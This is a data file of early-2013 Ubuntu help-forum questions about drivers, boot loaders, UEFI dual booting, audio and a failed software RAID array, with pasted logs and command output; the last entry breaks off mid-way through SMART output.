247897	how to install ubuntu from iso on hard disk itself ?	i 've already got a fully functional ubuntu workstation up and running . now in case i have to reinstall ubuntu due to some reason or other , i want to have an entry on the grub menu itself that points to the iso 's location on the hard drive , maybe on a completely separate partition . and when i select that option it should boot from that iso and function exactly as if i 'd booted from an install cd . any ideas ?
247899	dell inspiron 7520 and amd radeon driver 13.1 : how can i switch video cards ?	i have wanted to know can you make switching on the inspiron 7520 using an amd hd 7730m and an intel 4000hd . dell sent me two scripts : script 1 : # turn off discrete graphics card echo '\_sb.pci0.peg1.gfx0.doff ' > /proc/acpi/call # turn it back on echo '\_sb.pci0.peg1.gfx0.don ' > /proc/acpi/call script 2 : sudo apt-get install git git clone link intel ubuntu drivee cd acpi_call make sudo insmod acpi_call.ko ./test_off.sh : basically , what this is trying to do is to shut down the card i do n't need but i am not good enough to make those script work . may i have your help ?
247900	setting default application in gnome3 ?	question : i want to set the default program for .exe files to mono-runtime . right now , ubuntu wants to open it with monodevelop , which is pointless . so i right-click on the .exe file , and choose open with `` mono-runtime ( terminal ) '' , and it works . however , that does n't set it as default application . so i rightclick the .exe file again , click on properties , go to `` open with '' . there , under `` default application '' , it shows monodevelop . i want to change that to mono-runtime , so i click on `` show other applications '' , but mono-runtime is not listed in the list that appears there . my problem now is , in gnome3 , it 's impossible to enter a path to an application manually . in gnome2 , that used to work . so my question : how can i change the default application for .exe to `` mono-runtime ( terminal ) '' ?
247902	why i get `` no vala compiler found '' while compiling ?	i tried to install unity greeter ( unity-greeter_0.2.8.orig.tar.gz ) to my ubuntu 12.04 system from source . but after enter ./configure in terminal , following error appeared :
247903	compiling rtl8192cu driver for edimax ew-7811un for ubuntu 13.04 ( raring ringtail )	yesterday , i upgraded to ubuntu raring 13.04 and can no longer compile the latest rtl8192cu driver from the realtek website ( 3.4.4_4749-2012/11/12 ) . raring ringtail runs under kernel 3.8.0-1-generic which does not appear to be compatible with the current realtek driver . unfortunately , solving these compiler errors are a bit beyond my ability and any help would be appreciated . /tmp/rtl8192c $ sudo make make arch=x86_64 cross_compile= -c /lib/modules/3.8.0-1-generic/build m=/tmp/rtl8192c modules make [ 1 ] : entering directory `/usr/src/linux-headers-3.8.0-1-generic' cc [ m ] /tmp/rtl8192c/core/rtw_cmd.o in file included from /tmp/rtl8192c/core/rtw_cmd.c:23:0 : /tmp/rtl8192c/include/osdep_service.h : in function ‘thread_enter’ : /tmp/rtl8192c/include/osdep_service.h:575:2 : error : implicit declaration of function ‘daemonize’ [ -werror=implicit-function-declaration ] in file included from /tmp/rtl8192c/include/drv_types.h:69:0 , from /tmp/rtl8192c/core/rtw_cmd.c:24 : /tmp/rtl8192c/include/rtw_recv.h : in function ‘rxmem_to_recvframe’ : /tmp/rtl8192c/include/rtw_recv.h:626:30 : warning : cast from pointer to integer of different size [ -wpointer-to-int-cast ] /tmp/rtl8192c/include/rtw_recv.h:626:9 : warning : cast to pointer from integer of different size [ -wint-to-pointer-cast ] cc1 : some warnings being treated as errors make [ 2 ] : *** [ /tmp/rtl8192c/core/rtw_cmd.o ] error 1 make [ 1 ] : *** [ _module_/tmp/rtl8192c ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.8.0-1-generic' make : *** [ modules ] error 2
247911	how to correctly enable/test va-api on intel sandy bridge ?	i would like to know which package i have to install and how to test that is working fine ? i know there are many question similar but no one is complete and clear to me
247912	can not add any new ppa on ubuntu 10.04	this is an example : add-apt-repository ppa : libreoffice/ppa gpg : keyring `/tmp/tmpevjtjw/secring.gpg ' created gpg : keyring `/tmp/tmpevjtjw/pubring.gpg ' created gpg : requesting key 1378b444 from hkp server keyserver.ubuntu.com gpg : /tmp/tmpevjtjw/trustdb.gpg : trustdb created gpg : key 1378b444 : public key `` launchpad ppa for libreoffice packaging '' imported gpg : no ultimately trusted keys found gpg : total number processed : 1 gpg : imported : 1 ( rsa : 1 ) ok the problem is : when i try to install libreoffice it says : $ apt-get install libreoffice reading package lists ... done building dependency tree reading state information ... done e : could n't find package libreoffice i have the same problem with almost every apps ! ! how can i fix this ? many thx
247913	problem installing virtualbox	when i try to install virtualbox i get this message : cd/dvd 'ubuntu 12.10 quantal quetzal - release i386 ( 20121017.2 ) ' is required i do not know what to do ...
247914	windows 8 dual boot ubuntu 12.10 with uefi broken windows boot manager	brand new asus u500vz , windows 8 preinstalled . i removed the fakeraid , turned fastboot and secure boot off , and set the sata to ahci and deleted all existing partitions on both ssds . purchased windows 8 pro , installed on first disk , everything worked fine , win 8 created four partitions : ntfs recovery , fat32 efi , some odd microsoft reserved partition , and a main ntfs for the os . booted to ubuntu 12.10 live usb , it did n't detect windows 8 . i choose to install with manual partitions - the installer selected /dev/sda2 ( which is the fat32 efi partition windows 8 had created ) to use as efi . created partitions on the second disk for / ( /dev/sdb1 ) swap ( /dev/sdb5 and /home ( dev/sdb6 ) . i choose /dev/sda2 as the location to install the bootloader , as in uefi windows 8 and ubuntu should be able to share the efi partition . on reboot , ubuntu loads up automatically . so i ran backup-repair , which gave me this . gave me grub on reboot , the two windows 8 entries gave errors basically saying that the device could n't be found , and then the /efi/microsoft/boot/xxx.efi could n't be found . i tried again and got this paste.ubuntu.com/1572985/ and then this paste.ubuntu.com/1572995/ . through the bios i can see windows boot manager and two ubuntu entries . if i select the windows boot manager the screen flickers off and then returns with grub . i managed to ( i think ) fix the grub entries following the info here . and now i have a grub entry that will also flicker the screen and then return to grub . i have tried the windows 8 repair installation , and it just leaves me with the ability to boot into a windows 8 `` preparing to repair '' or similar screen . i am completely stuck . any advice please ? ! have i installed windows 8 in legacy bios mode somehow ? this seems unlikely because my bios does n't even seem to have an option for that ( in the boot priority list there are no options for simple booting from a hard drive , and when a bootable usb is in it is listed as a single uefi : xxxxx option . edit i just tried top answer here . now when i select either my new windows 8 grub entry ( which looks like : insmod part_gpt insmod fat insmod search_fs_uuid insmod chain search -- fs-uuid -- no-floppy -- set=root -- hint-bios=hd0 , gpt1 -- hint-efi=hd0 , gpt1 -- hint-baremetal=ahci0 , gpt1 1ce5-7f28 chainloader /efi/microsoft/boot/bootmgfw.efi or i choose windows boot manager from the bios i get the windows recovery `` your pc could n't start properly '' screen . error code : 0xc0000001 edit : new question on superuser.com relating to my utter failure to solve this problem : http : //superuser.com/questions/543369/can-uefi-settings-brick-new-laptops
247921	fn + numpad not working on xps m1530	i have a dell xps m1530 with xubuntu 12.10 . my fn + up arrow and down arrow for adjusting screen brightness work perfectly fine , but using the fn key with the function numpad does not work . these used to work with an old version of ubuntu or fedora a few years ago , but i ca n't remember what version ( s ) . actual keys : 7 8 9 0 u i o p j k l : m . / fn numpad keys : 7 8 9 / 4 5 6 * 1 2 3 - 0 . +
247923	memory too small on a partition	my home partition is full , so you know at what kind of trouble can leads this . i have two partitions by 40 gb and i was wondering which would be the best method for transferring files or adding a path ?
247930	12.10 - touchegg : ca n't add repository	i would like to add some multi-touch gestures , like those on a mac device . therefore i want to install touchegg but i get this error sudo add-apt-repository ppa : utouch-team/daily can not access ppa ( https : //launchpad.net/api/1.0/~utouch-team/+archive/daily ) to get ppa information , please check your internet connection .
247931	problem installing ethernet and wireless driver in ubuntu 12.10	my laptop is dell inspiron 14r . my ethernet and wireless controllers are : atheros ar8162 fast ethernet [ 1969:1090 ] ( rev 10 ) network controller broadcom bcm43142 802.11b/g/n [ 14e4:4365 ] ( rev 01 ) after reading from other posts i have downloaded compat-wireless-2012-02-28-p.tar.bz2 from another machine . but while doing make i have the following error /home/rahul/desktop/compat-wireless-2012-02-28-p/config.mk:242 : `` warning : config_cfg80211_wext will be deactivated or not working because kernel was compiled with config_wireless_ext=n . tools using wext interface like iwconfig will not work . to activate it build your kernel e.g . with config_libipw=m . '' ./scripts/gen-compat-autoconf.sh .config config.mk > include/linux /compat_autoconf.h make -c /home/rahul/desktop/compat-wireless-2012-02-28-p modules make [ 1 ] : entering directory `/home/rahul/desktop/compat-wireless-2012-02-28-p ' /home/rahul/desktop/compat-wireless-2012-02-28-p/config.mk:242 : `` warning : config_cfg80211_wext will be deactivated or not working because kernel was compiled with config_wireless_ext=n . tools using wext interface like iwconfig will not work . to activate it build your kernel e.g . with config_libipw=m . '' make -c /lib/modules/3.5.0-17-generic/build m=/home/rahul/desktop/compat-wireless-2012-02-28-p modules make : entering an unknown directory make : *** /lib/modules/3.5.0-17-generic/build : no such file or directory . stop . make : leaving an unknown directory make [ 1 ] : *** [ modules ] error 2 make [ 1 ] : leaving directory `/home/rahul/desktop/compat-wireless-2012-02-28-p ' make : *** [ .compat_autoconf_compat-wireless-2012-02-28-p ] error 2
247932	unable to merge win7 partition with unallocated space released from xubuntu	please see the current partitions in gparted below [ edit - i was n't allowed to post an image , i just posted the output of fdisk -l ] , i have moved & resized my xubuntu partition in order to allocate more space to win7 . however i am unable to resize win7 into it . i presume it has something to do with sda3 being marked as '' extended '' and cordend off . i 've googled around to know avail . can you help ? disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x2baa4004 device boot start end blocks id system /dev/sda1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sda2 206848 58969747 29381450 7 hpfs/ntfs/exfat /dev/sda3 58970110 312580095 126804993 5 extended /dev/sda5 100741120 310597631 104928256 83 linux /dev/sda6 310599680 312580095 990208 82 linux swap / solaris
247936	ubuntu install - wo n't fit on cd	ubuntu wo n't fit on a cd i need to install to a clean drive and have downloaded ubuntu 12.10 . the file size exceeds the cd capacity so i ca n't burn it to cd . target computer has cd . not dvd . any suggestions ?
247937	how to create udev event that runs a command for mx510 usb mouse ?	i have logitech mx510 mouse which uses 400cpi resolution by default . i want to set it to 800cpi automatically . how can i set a udev rule that runs lomoco -8 when i plug in the mouse ?
247942	how do i set deluge as default torrent client ?	i would like to set deluge as primary , but i ca n't find it in the file system . when i download froma certain pirating site , it says `` choose client to download with '' transmission alaways shows up , but when i try to choose an other application i just ca n't find deluge in the file system .
247943	are there any plans to improve mtp support on future ubuntu releases ?	even when i did manage to connect my google nexus to ubuntu , i think it would be great to have mtp support right from the start .
247946	live ubuntu 12.04 usb disc not detected in uefi	this was not my first time attempting dual boot , but it is for doing this with windows 8 . the troublesome uefi does not detect my usb stick although i changed the boot order and disabled secure boot . then i changed to legacy bios , it now detects the usb stick and i can boot into a live session , but it is still useless as windows 8 needs to boot using uefi and automatically i have to install ubuntu as uefi too , but there is no such option since i am using legacy bios . so i tried to install ubuntu using legacy bios ( thought of switching between uefi and legacy bios when i want to switch os ) , but when i restart , i ca n't boot into ubuntu at all , it always states `` please insert removable media and ... '' ... any possible workaround for this ? it is kinda important as i have projects to be done using ubuntu . **note : i am running acer aspire v3-571g . made a live usb stick using ubuntu-12.04.1-desktop-amd64.iso
247953	why is microsoft word complaining about libre office 's .odt files being corrupt ?	whenever i give someone a .odt file created with libreoffice and they open it with microsoft word , it says that the file is corrupt . is there a crlf problem or are the .odt files ms word makes and the .odt files libreoffice makes different altogether ? i 'm trying to promote using .odt files ( there 's an xkcd comic on this : p ) but it seems as though microsoft does n't want that to happen . is there a way to make sure that my .odt files will not appear corrupt to microsoft word ?
247955	changed permissions , now can not see contents of drive	i was having problems reading all files on an extra hard drive so i attempted to `` fix '' this with these commands as root : chown dave : dave /media/250gb chmod 644 * /media/250gb i 'm now unable to see the drive and mount it in my nautilus shortcuts and i need to go into nautilus → file system → media → 250gb to see my files . i had two folders in the drive both with backed up data , but both folder now show as files which nautilus does n't know what to do with them ( it does n't treat them as folders ) . ls -l reports : ... : /media/250gb $ ls -l total 8 drwxr-xr-x 4 root root 4096 2013-01-23 19:24 2013-home-backup drwxr-xr-x 11 root root 4096 2013-01-23 19:22 2013-work-backup
247956	which operating system takes more advantage of multi core cpus	i want to know which one will benefit more from amd 8 ( or in multi core setup in general ) core setup windows or ubuntu or there will be no difference ? ? thank you in advanced
247959	asus eee pc r101d videos do n't play properly in lubuntu 12.10	i installed lubuntu 12.10 on an asus eee pc r101d ( intel atom n450 , intel gma 3150 ) . and there is a problem with video playback . it wo n't play videos properly , only stuttering , extremely slow , hanging . when it still had windows 7 starter on it , the very same videos played smoothly . is there a fix for this ?
247961	normalizing video volume using avconv	i have a collection of videos , in the .mkv and .mp4 ( aac+h.264 ) formats . the .mkv files are ok , but all the .mp4 files have such a low volume that i can hardly hear it on my phone , even when volume is maxed . i convert them using avconv so they 're smaller for my phone . it works fine , but i have not yet found out how i can normalize the volume on all the .mp4 files so they match the .mkv files . just raising the volume alone would be a great achievement .
247962	certain sounds do n't work after i start jack	i have ubuntu 12.10 on an acer aspire one 722 with alsa & an ati soundcard . so , i finally figured out how to start jack ; i type in jackd & qjackctl & jack_mixer and then open a new terminal and open the applications i want to use jack with , i.e . zynaddsubfx & ardour2 & hydrogen ... this is the only way it will start jack . i do n't know why i need to open it with the mixer , but it 's been working ... maybe i need other jack applications ? ? ? for all i know , these are the only three i have . 1 . ) if i use other applications before starting jack , when i open qjackctl ( or jackd & qjackctl ) it says it does n't recognize it : 13:09:14.967 patchbay deactivated . 13:09:15.097 statistics reset . 13:09:15.171 alsa connection change . 13:09:15.795 d-bus : service is available ( org.jackaudio.service aka jackdbus ) . 13:09:16.461 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 13:09:16.486 alsa connection graph change . sat jan 26 13:09:15 2013 : starting jack server ... sat jan 26 13:09:15 2013 : jack server starting in realtime mode with priority 10 sat jan 26 13:09:16 2013 : control device hw:0 sat jan 26 13:09:16 2013 : control device hw:0 sat jan 26 13:09:16 2013 : acquired audio card audio0 sat jan 26 13:09:16 2013 : creating alsa driver ... hw:0|hw:0|1024|2|44100|0|0|nomon|swmeter|-|32bit sat jan 26 13:09:16 2013 : control device hw:0 sat jan 26 13:09:16 2013 : [ 1m [ 31merror : alsa : can not open pcm device alsa_pcm for playback . falling back to capture-only mode [ 0m sat jan 26 13:09:16 2013 : [ 1m [ 31merror : can not initialize driver [ 0m sat jan 26 13:09:16 2013 : [ 1m [ 31merror : jackserver : :open failed with -1 [ 0m sat jan 26 13:09:16 2013 : [ 1m [ 31merror : failed to open server [ 0m sat jan 26 13:09:17 2013 : saving settings to `` /home/laura/.config/jack/conf.xml '' ... 13:09:19.882 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started 2 . ) when i run jackd , jack_mixer , and qjackctl as startup applications , they start up fine . and i can connect zynaddsubfx and ardour with them etc . but if i want to play a youtube video , no sound comes out , even if i quit jack and then try to play it . it seems like starting jack messes with the sound for my non-jack applications . what should i do ? thanks .
247964	nautilus 3.6.3 : open folder with	ubuntu 12.10 64 bits gnome-shell 3.6.2 nautilus 3.6.3 i have installed smplayer . it has a useful ( to me ) option called `` add folder content to smplayer playlist '' ( or something like that , my native language is spanish ) . but nautilus 3.6.3 does n't show this option for folders . has this option gone ?
247965	after upgrading a vm to 12.04 my eth0 mac is all zeroes	i did a series of upgrades from 10.04 to 12.04 on a vm under xen virtualisation . now for some reason eth0 wo n't start up , ifconfig says mac address is 00:00:00:00:00:00 , i 've tried setting the address but the network still refuses to come up . i 've rebooted into dsl and managed to run ifconfig , and this is the result something in the new release broke networking . how can i find out what ?
247967	how to get a netgear n300 adapter to work with ubuntu 12.10 32-bit	no other tutorials i can find are for ubuntu 12.10 and for some reason or another i ca n't do any of them . lsusb brings up a list with what i want to find , but i do n't know what to do from there . i tried to follow the instructions for installing ndiswrapper , but i ran into problems with the terminal . i do n't know how to get the ndiswrapper packages from the install disc . as you can tell , i 'm a complete linux/ubuntu noob . i can not access the web , i 'm at another computer typing this , and the terminal does n't like me very much . please help me get a netgear n300 wireless adapter work on ubuntu . the install disc does n't help , and nothing else i try works for weird reasons .
247969	how to change the default os in grub ?	i currently have a dual boot set up with windows and ubuntu 12.04 . ubuntu is the default . i 'm looking for the commands to change and make windows the default on startup .
247973	will android apps be compatible with the ubuntu phone os ?	i have heard that there is some similarity in the code used for both ubuntu and android programs , but has there been any mention in all the recent publicity over the forthcoming ubuntu os for phones , whether or not existing android apps will be compatible with ubuntu ?
247974	hosted website unavailable after uninstalling local copy	i attempted to install my hosted wordpress site on my 12.04 desktop following the ubuntu lamp guide , then after being unable to get it running properly attempted to uninstall it using suggestions in the ubuntu forum and synaptic . when i attempt to access the hosted site with firefox or chrome , i get ca n't establish a connection to the server at www.interfaithsheltersf.org i get a similar response trying to access localhost . i can connect to the hosted site on my wife 's computer . i only know a few basic terminal commands , but following one suggestion to see whether all traces of the installation were removed , i got this : gaines @ gaines : / $ dpkg -- get-selections | grep apache libapache2-mod-php5 deinstall gaines @ gaines : / $ dpkg -- get-selections | grep mysql libmysqlclient18 deinstall mysql-server-5.5 deinstall php5-mysql deinstall any suggestions as to what i need to do ?
247975	xubuntu 12.10 how do shortcuts ( technically ) trigger actions . trying to debug shortcut randomly stop working	keyboard shortcuts randomly stops working , it appears to primarily affect shortcuts involving the alt-key . i have seen this issue in 12.04 as well . i 'm now trying to research the issue in more detail , so i 'm hoping there is some way to log what happens when a shortcut key combination is pressed . i 'm still very interested in knowing how xubuntu connects a shortcut with its intended action , but i did something that may have solved the issue : going through dconf-editor under org/compiz/integrated/show-hud i removed the the shortcut `` alt '' the issue hase n't shown up since . this indicates that the original issue may be triggered by compiz grabbing the alt-key sometimes .
247977	how do i install minggw-64 bit ?	how do i install minggw-64 bit ? what sudo commands must i issue ? i am new to ubuntu and have 12.10 , 64 bit , us english installed .
247981	software raid - mdadm - re-find my array	description today i plugged in another hard drive and unplugged my raid drives to ensure when i wiped the drive , i would not accidentally pick the wrong drives . now that i have re-plugged in my drives , the software raid 1 array is no longer being mounted/recognized/found . using disk utility , i could see that the drives are /dev/sda and /dev/sdb so i tried running sudo mdadm -a /dev/sda /dev/sdb unfortunately i keep getting an error message stating mdadm : device /dev/sda exists but is not an md array specifications : os : ubuntu 12.04 lts desktop ( 64 bit ) drives : 2 x 3tb wd red ( same models brand new ) os installed on third drive ( 64gb ssd ) ( many linux installs ) motherboard : p55 ftw processor : intel i7-870 full specs result of sudo mdadm -- assemble -- scan mdadm : no arrays found in config file or automatically when i boot from recovery mode i get a zillion 'ata1 error ' codes flying by for a very long time . can anyone let me know the proper steps for recovering the array ? i would be happy just recover the data if that is a possible alternative to rebuilding the array . i have read about 'test disk ' and it states on the wiki that it can find lost partitions for linux raid md 0.9/1.0/1.1/1.2 but i am running mdadm version 3.2.5 it seems . has anyone else had experience with using this to recover software raid 1 data ? result of sudo mdadm -- examine /dev/sd* | grep -e `` ( ^\/dev|uuid ) '' mdadm : no md superblock detected on /dev/sda . mdadm : no md superblock detected on /dev/sdb . mdadm : no md superblock detected on /dev/sdc1 . mdadm : no md superblock detected on /dev/sdc3 . mdadm : no md superblock detected on /dev/sdc5 . mdadm : no md superblock detected on /dev/sdd1 . mdadm : no md superblock detected on /dev/sdd2 . mdadm : no md superblock detected on /dev/sde . /dev/sdc : /dev/sdc2 : /dev/sdd : contents of mdadm.conf : # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost < system > # instruct the monitoring daemon where to send mail alerts mailaddr root # definitions of existing md arrays # this file was auto-generated on tue , 08 jan 2013 19:53:56 +0000 # by mkconf $ id $ result of sudo fdisk -l as you can see sda and sdb are missing . disk /dev/sdc : 64.0 gb , 64023257088 bytes 255 heads , 63 sectors/track , 7783 cylinders , total 125045424 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009f38d device boot start end blocks id system /dev/sdc1 * 2048 2000895 999424 82 linux swap / solaris /dev/sdc2 2002942 60594175 29295617 5 extended /dev/sdc3 60594176 125044735 32225280 83 linux /dev/sdc5 2002944 60594175 29295616 83 linux disk /dev/sdd : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x58c29606 device boot start end blocks id system /dev/sdd1 * 2048 206847 102400 7 hpfs/ntfs/exfat /dev/sdd2 206848 234455039 117124096 7 hpfs/ntfs/exfat disk /dev/sde : 60.0 gb , 60022480896 bytes 255 heads , 63 sectors/track , 7297 cylinders , total 117231408 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 disk /dev/sde does n't contain a valid partition table the output of dmesg | grep ata was very long so here is a link : http : //pastebin.com/raw.php ? i=h2dph66y the output of dmesg | grep ata | head -n 200 after setting bios to ahci and having to boot without those two discs . [ 0.000000 ] bios-e820 : 000000007f780000 - 000000007f78e000 ( acpi data ) [ 0.000000 ] memory : 16408080k/18874368k available ( 6570k kernel code , 2106324k absent , 359964k reserved , 6634k data , 924k init ) [ 1.043555 ] libata version 3.00 loaded . [ 1.381056 ] ata1 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4100 irq 47 [ 1.381059 ] ata2 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4180 irq 47 [ 1.381061 ] ata3 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4200 irq 47 [ 1.381063 ] ata4 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4280 irq 47 [ 1.381065 ] ata5 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4300 irq 47 [ 1.381067 ] ata6 : sata max udma/133 abar m2048 @ 0xfbff4000 port 0xfbff4380 irq 47 [ 1.381140 ] pata_acpi 0000:0b:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 1.381157 ] pata_acpi 0000:0b:00.0 : setting latency timer to 64 [ 1.381167 ] pata_acpi 0000:0b:00.0 : pci int a disabled [ 1.429675 ] ata_link link4 : hash matches [ 1.699735 ] ata1 : sata link down ( sstatus 0 scontrol 300 ) [ 2.018981 ] ata2 : sata link down ( sstatus 0 scontrol 300 ) [ 2.338066 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) [ 2.657266 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) [ 2.976528 ] ata5 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 2.979582 ] ata5.00 : atapi : hl-dt-st dvdram gh22ns50 , tn03 , max udma/100 [ 2.983356 ] ata5.00 : configured for udma/100 [ 3.319598 ] ata6 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 3.320252 ] ata6.00 : ata-9 : samsung ssd 830 series , cxm03b1q , max udma/133 [ 3.320258 ] ata6.00 : 125045424 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 3.320803 ] ata6.00 : configured for udma/133 [ 3.324863 ] write protecting the kernel read-only data : 12288k [ 3.374767 ] pata_marvell 0000:0b:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 [ 3.374795 ] pata_marvell 0000:0b:00.0 : setting latency timer to 64 [ 3.375759 ] scsi6 : pata_marvell [ 3.376650 ] scsi7 : pata_marvell [ 3.376704 ] ata7 : pata max udma/100 cmd 0xdc00 ctl 0xd880 bmdma 0xd400 irq 18 [ 3.376707 ] ata8 : pata max udma/133 cmd 0xd800 ctl 0xd480 bmdma 0xd408 irq 18 [ 3.387938 ] sata_sil24 0000:07:00.0 : version 1.1 [ 3.387951 ] sata_sil24 0000:07:00.0 : pci int a - > gsi 19 ( level , low ) - > irq 19 [ 3.387974 ] sata_sil24 0000:07:00.0 : applying completion irq loss on pci-x errata fix [ 3.388621 ] scsi8 : sata_sil24 [ 3.388825 ] scsi9 : sata_sil24 [ 3.388887 ] scsi10 : sata_sil24 [ 3.388956 ] scsi11 : sata_sil24 [ 3.389001 ] ata9 : sata max udma/100 host m128 @ 0xfbaffc00 port 0xfbaf0000 irq 19 [ 3.389004 ] ata10 : sata max udma/100 host m128 @ 0xfbaffc00 port 0xfbaf2000 irq 19 [ 3.389007 ] ata11 : sata max udma/100 host m128 @ 0xfbaffc00 port 0xfbaf4000 irq 19 [ 3.389010 ] ata12 : sata max udma/100 host m128 @ 0xfbaffc00 port 0xfbaf6000 irq 19 [ 5.581907 ] ata9 : sata link up 3.0 gbps ( sstatus 123 scontrol 0 ) [ 5.618168 ] ata9.00 : ata-8 : ocz-revodrive , 1.20 , max udma/133 [ 5.618175 ] ata9.00 : 117231408 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 5.658070 ] ata9.00 : configured for udma/100 [ 7.852250 ] ata10 : sata link up 3.0 gbps ( sstatus 123 scontrol 0 ) [ 7.891798 ] ata10.00 : ata-8 : ocz-revodrive , 1.20 , max udma/133 [ 7.891804 ] ata10.00 : 117231408 sectors , multi 16 : lba48 ncq ( depth 31/32 ) [ 7.931675 ] ata10.00 : configured for udma/100 [ 10.022799 ] ata11 : sata link down ( sstatus 0 scontrol 0 ) [ 12.097658 ] ata12 : sata link down ( sstatus 0 scontrol 0 ) [ 12.738446 ] ext4-fs ( sda3 ) : mounted filesystem with ordered data mode . opts : ( null ) smart tests on drives both came back 'healthy ' however i can not boot the machine with the drives plugged in when the machine is in ahci mode ( i dont know if this matters but these are 3tb wd reds ) . i hope this means the drives are fine as they were quite a bit to buy and brand new . disk utility shows a massive grey 'unknown ' shown below : i have since removed my revodrive to try and make things simpler/clearer . as far as i can tell , the motherboard does n't have two controllers . perhaps the revodrive that i have since removed , which plugs in through pci was confusing things ? has anyone got any suggestions for how to recover the data from the drive rather than rebuilding the array ? i.e . a step-by-step on using testdisk or some other data recovery program ... . i have tried putting the drives in another machine . i had the same issue where the machine would not get past the bios screen , but this one would constantly reboot itself . the only way to get the machine to boot would be to unplug the drives . i tried using different sata cables as well with no help . i did once manage to get it to discover the drive but again mdadm -- examine revealed no block . does this suggest my disks themselves are # @ @ # $ # @ even though the short smart tests stated they were 'healthy ' ? it appears the drives are truly beyond rescue . i cant even format the volumes in disk utility . gparted wont see the drives to put a partition table on . i cant even issue a secure erase command to fully reset the drives . it was definitely a software raid that i had set up after discvering that the hardware raid i had initially tried was actually 'fake ' raid and slower than software raid . thank you for all your efforts to trying to help me . i guess the 'answer ' is there is nothing you can do if you somehow manage to kill both your drives simultaneously . i retried smart tests ( this time in command line rather than disk utility ) and the drives do respond successfully 'without error ' . however , i am unable to format the drives ( using disk utility ) or have them recognized by gparted in that machine or another . i am also unable to run hdparm secure erase or security-set-password commands on the drives . perhaps i need to dd /dev/null the entire drives ? how on earth are they still responding to smart but two computers are unable to do anything with them ? i am running long smart tests on both drives now and will post results in 255 minutes ( that 's how long it said it was going to take ) . i have put the processor information up with the other technical specs ( by motherboard etc ) it turns out to be a pre-sandy architecture . output of extended smart scan of one drive : smartctl 5.41 2011-06-09 r3365 [ x86_64-linux-3.2.0-36-generic ] ( local build ) copyright ( c ) 2002-11 by bruce allen , http : //smartmontools.sourceforge.net === start of information section === device model : wdc wd30efrx-68ax9n0 serial number : wd-wmc1t1480750 lu wwn device id : 5 0014ee 058d18349 firmware version : 80.00a80 user capacity : 3,000,592,982,016 bytes [ 3.00 tb ] sector sizes : 512 bytes logical , 4096 bytes physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 9 ata standard is : exact ata specification draft version not indicated local time is : sun jan 27 18:21:48 2013 gmt smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x00 ) offline data collection activity was never started . auto offline data collection : disabled . self-test execution status : ( 0 ) the previous self-test routine completed without error or no self-test has ever been run . total time to complete offline data collection : ( 41040 ) seconds . offline data collection capabilities : ( 0x7b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 255 ) minutes . conveyance self-test routine recommended polling time : ( 5 ) minutes . sct capabilities : ( 0x70bd ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x002f 200 200 051 pre-fail always - 0 3 spin_up_time 0x0027 196 176 021 pre-fail always - 5175 4 start_stop_count 0x0032 100 100 000 old_age always - 29 5 reallocated_sector_ct 0x0033 200 200 140 pre-fail always - 0 7 seek_error_rate 0x002e 200 200 000 old_age always - 0 9 power_on_hours 0x0032 100 100 000 old_age always - 439 10 spin_retry_count 0x0032 100 253 000 old_age always - 0 11 calibration_retry_count 0x0032 100 253 000 old_age always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 29 192 power-off_retract_count 0x0032 200 200 000 old_age always - 24 193 load_cycle_count 0x0032 200 200 000 old_age always - 4 194 temperature_celsius 0x0022 121 113 000 old_age always - 29 196 reallocated_event_count 0x0032 200 200 000 old_age always - 0 197 current_pending_sector 0x0032 200 200 000 old_age always - 0 198 offline_uncorrectable 0x0030 